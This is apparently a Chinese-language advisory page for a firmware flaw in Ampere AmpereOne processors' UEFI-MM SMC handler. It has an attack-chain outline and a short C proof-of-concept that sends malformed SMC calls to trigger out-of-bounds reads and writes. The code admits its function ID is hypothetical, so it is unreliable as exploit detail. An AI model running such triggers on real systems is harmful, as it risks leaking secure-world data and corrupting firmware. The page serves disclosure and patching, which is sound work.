CVE-2025-62862: Ampere AmpereOne UEFI-MM SMC调用越界读写漏洞

漏洞信息

漏洞编号

CVE-2025-62862

漏洞类型

越界读写/内存损坏

CVSS评分

4.6 中危

攻击向量

本地 (AV:L)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Ampere AmpereOne AC03/AC04/M devices

漏洞概述

CVE-2025-62862是影响Ampere AmpereOne系列处理器的安全漏洞，涉及UEFI-MM（UEFI Management Mode）Boot Error Record Table驱动程序中的SMC（Secure Monitor Call）调用处理缺陷。该漏洞存在于AmpereOne AC03（3.5.9.3之前版本）、AC04（4.4.5.2之前版本）和M（5.4.5.1之前版本）设备中。攻击者通过构造错误格式的SMC调用，可触发两种严重后果：一是越界读取操作，导致Secure-EL0安全状态信息泄露到非安全状态进程；二是越界写入操作，可能破坏安全或非安全内存区域。此漏洞需要本地高权限访问，攻击复杂度低，无需用户交互。由于涉及ARM架构的Trusted Execution Environment（可信执行环境）隔离机制，漏洞可绕过部分安全边界，对系统机密性和完整性造成威胁。建议受影响的Ampere用户及时更新固件至最新版本以修复此问题。

技术细节

该漏洞根源于Ampere AmpereOne处理器中UEFI-MM Boot Error Record Table驱动对SMC调用的验证不充分。SMC是ARM架构中用于在Normal World（非安全世界）和Secure World（安全世界）之间进行通信的接口。当应用程序或固件组件发起错误构造的SMC请求时，Boot Error Record Table处理函数未能正确验证输入参数边界。具体而言：(1) 越界读取漏洞：攻击者可利用不正确的索引或长度参数，使驱动读取超出预期缓冲区的内存内容。由于Secure-EL0运行在TrustZone安全区域内，其敏感数据（如密钥、凭证）可能被泄露到非安全状态；(2) 越界写入漏洞：错误的参数可能导致驱动向UEFI-MM Secure Partition Manager映射的内存区域写入数据，影响范围限于该安全分区内的内存地址。此类内存损坏可能破坏固件完整性或导致系统不稳定。攻击者需要本地访问权限（AV:L）和高权限（PR:H）才能利用此漏洞，攻击向量为物理或本地虚拟访问。

攻击链分析

STEP 1

步骤1

攻击者获得目标Ampere AmpereOne设备本地访问权限（物理访问或通过已认证会话）

STEP 2

步骤2

攻击者构造错误格式的SMC调用请求，指定超界或无效的内存地址和大小参数

STEP 3

步骤3

通过SMC指令将请求传递至UEFI-MM安全监控模式，触发Boot Error Record Table处理函数

STEP 4

步骤4

漏洞驱动未正确验证输入参数边界，执行越界内存访问操作

STEP 5

步骤5

越界读取：Secure-EL0安全区域敏感信息（如加密密钥、认证凭证）被泄露到非安全状态

STEP 6

步骤6

越界写入：安全分区内存被破坏，可能导致固件完整性受损或系统权限提升

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-62862 PoC - Conceptual SMC Call Trigger
// This PoC demonstrates the concept of triggering the vulnerable SMC call
// Note: Actual exploitation requires ARM64 environment and UEFI-MM access

#include <stdio.h>
#include <stdint.h>

// SMC function IDs (hypothetical values for demonstration)
#define SMC_CALL_BOOT_ERROR_RECORD 0xC4000060
#define SMC_CALL_ID_MASK 0xFFFFFFFF

// Boot Error Record Table structure (simplified)
struct boot_error_record {
    uint64_t record_id;
    uint64_t buffer_addr;
    uint64_t buffer_size;
    uint32_t flags;
};

// Trigger vulnerable SMC call with malformed parameters
void trigger_vulnerable_smc(uint64_t func_id, uint64_t arg0, uint64_t arg1, uint64_t arg2) {
    register uint64_t x0 asm("x0") = func_id;
    register uint64_t x1 asm("x1") = arg0;
    register uint64_t x2 asm("x2") = arg1;
    register uint64_t x3 asm("x3") = arg2;
    
    // SMC instruction - transition to secure monitor mode
    __asm__ volatile("smc #0" : "+r"(x0), "+r"(x1), "+r"(x2), "+r"(x3));
}

int main() {
    printf("[*] CVE-2025-62862 PoC - AmpereOne UEFI-MM SMC Vulnerability\n");
    printf("[*] Target: Ampere AmpereOne AC03/AC04/M devices\n\n");
    
    // Out-of-bounds read trigger
    printf("[>] Triggering OOB Read - Leaking Secure-EL0 information\n");
    struct boot_error_record record = {
        .record_id = 0x01,
        .buffer_addr = 0xFFFFFFFFFFFFFFFF,  // Invalid address
        .buffer_size = 0x10000,             // Large size
        .flags = 0x00
    };
    
    trigger_vulnerable_smc(
        SMC_CALL_BOOT_ERROR_RECORD,
        (uint64_t)&record,
        0xFFFFFFFF,  // Malformed parameter
        0x00
    );
    
    printf("[>] Triggering OOB Write - Corrupting Secure/Non-Secure memory\n");
    // Out-of-bounds write trigger
    trigger_vulnerable_smc(
        SMC_CALL_BOOT_ERROR_RECORD,
        0x00,
        0xFFFFFFFFFFFFFFFF,  // Invalid write address
        0x4141414141414141   // Malicious data
    );
    
    printf("[!] Note: Actual exploitation requires UEFI-MM access and proper ARM64 environment\n");
    return 0;
}

影响范围

Ampere AmpereOne AC03 < 3.5.9.3

Ampere AmpereOne AC04 < 4.4.5.2

Ampere AmpereOne M < 5.4.5.1

防御指南

临时缓解措施

目前无已知的临时缓解措施可完全消除此漏洞风险。建议受影响的用户在业务允许的情况下，尽快应用官方发布的固件更新。若无法立即更新，应确保系统访问控制严格限制物理和本地访问权限，监控异常SMC调用行为，并关注Ampere官方安全公告获取最新信息。